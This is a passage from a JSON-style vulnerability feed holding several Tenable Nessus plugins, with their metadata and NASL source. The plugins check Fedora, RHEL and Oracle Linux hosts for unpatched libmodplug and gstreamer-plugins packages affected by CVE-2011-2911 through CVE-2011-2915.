\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e28a386\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected audacious-plugins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:audacious-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"audacious-plugins-2.4.5-4.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"audacious-plugins\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-08-23T00:00:00", "title": "Fedora 16 : libmodplug-0.8.8.4-1.fc16 (2011-10452)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-10452.NASL", "href": "https://www.tenable.com/plugins/nessus/55946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10452.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55946);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"FEDORA\", value:\"2011-10452\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 16 : libmodplug-0.8.8.4-1.fc16 (2011-10452)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b571bd05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"libmodplug-0.8.8.4-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-08-17T00:00:00", "title": "Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-10544.NASL", "href": "https://www.tenable.com/plugins/nessus/55870", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10544.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55870);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10544\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88a98c41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"libmodplug-0.8.8.4-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:09:45", "description": "Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 26, "published": "2011-09-07T00:00:00", "title": "RHEL 4 : gstreamer-plugins (RHSA-2011:1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-07T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel"], "id": "REDHAT-RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/56111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56111);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"RHEL 4 : gstreamer-plugins (RHSA-2011:1264)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1264\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected gstreamer-plugins and / or gstreamer-plugins-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1264\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-08-17T00:00:00", "title": "Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-10503.NASL", "href": "https://www.tenable.com/plugins/nessus/55869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10503.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55869);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10503\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8739c01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"libmodplug-0.8.8.4-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:46:15", "description": "From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:gstreamer-plugins-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:gstreamer-plugins"], "id": "ORACLELINUX_ELSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/68345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# Oracle Linux Security Advisory ELSA-2011-1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68345);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n 